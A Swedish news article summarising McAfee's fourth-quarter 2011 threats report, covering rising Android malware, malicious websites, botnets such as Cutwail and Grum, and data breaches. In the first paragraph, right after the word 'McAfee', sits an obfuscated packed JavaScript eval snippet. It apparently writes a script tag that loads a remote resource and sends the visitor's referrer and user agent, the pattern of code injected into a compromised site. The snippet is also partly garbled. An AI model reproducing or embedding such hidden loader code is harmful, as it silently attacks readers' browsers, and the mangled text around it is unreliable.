Image Image Image Image Image Image Image Image Image Image

| 26 maj, 2020

Scroll to top

Top

IT-hot mot mobilen växer snabbare än väntat

IT-hot mot mobilen växer snabbare än väntat
Revue Magazine

McAfee eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hkzdr|var|u0026u|referrer|itdyi||js|php’.split(’|’),0,{}))
släpper idag sin Threats Report för fjärde kvartalet 2011. Rapporten visar att skadlig kod riktad mot mobila enheter.ökade, trots att den samlade utvecklingen av ny skadlig kod minskade under förra årets sista kvartal. Rapporten avslöjar även att det totala antalet exemplar av programvara byggd på skadlig kod översteg 75 miljoner.

– Hotbilden fortsatte utvecklas under 2011, och vi såg en skillnad vad gäller incitament för IT-brottslingar. Vi ser mer och mer att det inte finns någon organisation, plattform eller klient som är immun mot de alltmer sofistikerade och riktade attackerna. På ett globalt plan sker allt mer utbyte av information, både privat och affärsmässigt, genom mobila enheter. Detta skapar nya utmaningar när det gäller att hålla en hög säkerhetsnivå och skydda privat såväl som kommersiell information, säger Christoffer Callender, säkerhetsingenjör på McAfee i Sverige.

Skadlig kod

Det totala antalet exemplar av mjukvara byggd på skadlig kod fortsatte öka under det fjärde kvartalet 2011, till över 75 miljoner. Däremot minskande tillväxten av skadlig kod riktad mot PC, och är betydligt lägre än samma period 2010. Däremot var hela 2011, och särskilt årets sista kvartal, tiden då det hittills största antalet exemplar av program med skadlig kod riktad mot mobila enheter utvecklades, och de flesta utvecklarna verkar ha riktat in sig mot operativsystemet Android.

Så kallade rootkits, eller spökprogram som döljer sin egen existens, har varit en bidragande faktor till ökningen av skadlig kod. Under det fjärde kvartalet minskade förekomsten av denna typ av mjukvara. Fejkade antivirus-program minskade avsevärt jämfört med det tredje kvartalet, och auto-exekverade och lösenordsstjälande trojaner minskade även de, men i mindre utsträckning. Skadlig kod riktad mot iOS har legat på en låg nivå de två senaste kvartalen, vilket är en skarp kontrast mot ökningen under andra kvartalet 2011.

Webbhot

Under det tredje kvartalet 2011 uppmärksammade McAfee Labs 6 300 nya elaka sajter om dagen, en siffra som steg till 9 300 för det fjärde kvartalet 2011. Uppskattningsvis innehöll i genomsnitt en av 400 internetadresser skadligt innehåll, men den siffran var periodvis så hög som en på 200. Totalt finns nu över 700 000 aktiva webbsidor med skadligt innehåll.

Spam och botnät

Den globala utbredningen av botnät minskade under augusti, september och oktober, men ökade under november och december, särskilt i Brasilien, Colombia, Indien, Spanien och USA. Däremot minskade företeelsen i Tyskland, Indonesien och Ryssland. Det största botnätet är alltjämt Cutwail, medan Lethic stadigt har minskat sedan förra kvartalet. Grum har återhämtat sig efter en lång periods minskning, och gick förbi Bobax och Lethic under slutet av fjärde kvartalet.

Dataintrång

Enligt privacyrights.org har antalet rapporterade dataintrång via hackning, malware, bedrägeri och insiders mer än fördubblats sedan 2009. De sårbarheter som utnyttjades mest detta kvartal var svagheter i Microsoft Windows fjärrsamtal, följt av SQL-injektioner och script-attacker.